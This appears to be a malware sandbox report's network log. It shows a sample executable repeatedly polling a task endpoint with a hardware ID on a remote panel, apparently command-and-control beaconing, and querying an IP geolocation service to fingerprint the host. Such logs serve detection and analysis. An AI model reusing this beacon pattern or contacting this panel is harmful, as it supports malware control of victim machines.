                                                                                                                                        date: Mon, 23 Jan 2023 20:26:05 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:05.537333012 CET931OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:05.709048033 CET931INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:05 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:05.818567991 CET931OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:05.990093946 CET932INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:05 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:06.100217104 CET932OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:06.271626949 CET933INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:06 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:06.381253004 CET933OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:06.606432915 CET933INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:06 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:06.725090027 CET933OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:06.893277884 CET934INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:06 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:07.007277966 CET934OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:07.179003000 CET934INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:07 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:07.288518906 CET935OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:07.458165884 CET935INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:07 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:07.623275995 CET935OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:07.795058966 CET936INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:07 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:07.903924942 CET936OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:08.130971909 CET936INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:08 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:08.278064966 CET937OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:08.447007895 CET937INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:08 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:09.027549982 CET937OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:09.280329943 CET938INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:09 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:09.440654993 CET938OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:09.610276937 CET938INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:09 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:10.163378954 CET938OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:10.390861034 CET939INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:10 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:10.546200037 CET939OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:10.717154980 CET940INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:10 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:10.821436882 CET940OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:10.988811016 CET940INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:10 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:11.100404978 CET940OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:11.339256048 CET941INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:11 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:11.444247007 CET941OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:11.613493919 CET941INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:11 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:11.725845098 CET941OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:11.905600071 CET942INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:11 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:12.007060051 CET942OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:12.273540020 CET943INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:12 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:12.386657953 CET943OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:12.557701111 CET943INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:12 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:12.663096905 CET944OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:12.837805033 CET944INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:12 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:12.944468975 CET944OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:13.206904888 CET945INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:13 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:13.319804907 CET945OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:13.550713062 CET945INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:13 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:13.663201094 CET946OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:27:13.849142075 CET947INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:27:13 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        17192.168.2.34972092.249.45.11380C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:27:18.300055981 CET947OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:27:18.484451056 CET948INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:27:18 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:27:18.590637922 CET948OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:27:18.768790007 CET949INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:27:18 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:27:18.873500109 CET949OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:27:19.052223921 CET949INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:27:18 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:27:19.161968946 CET949OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:27:19.405400038 CET950INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:27:19 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:27:19.525784016 CET950OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:27:19.703243017 CET950INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:27:19 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:27:19.804735899 CET951OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:27:20.042505026 CET951INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:27:19 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        2192.168.2.349704208.95.112.180C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:11.630594015 CET106OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:25:11.664326906 CET106INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:25:11 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 47
                                                                                                                                        X-Rl: 42
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        3192.168.2.349705208.95.112.180C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:22.278419018 CET107OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:25:22.312055111 CET107INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:25:21 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 36
                                                                                                                                        X-Rl: 41
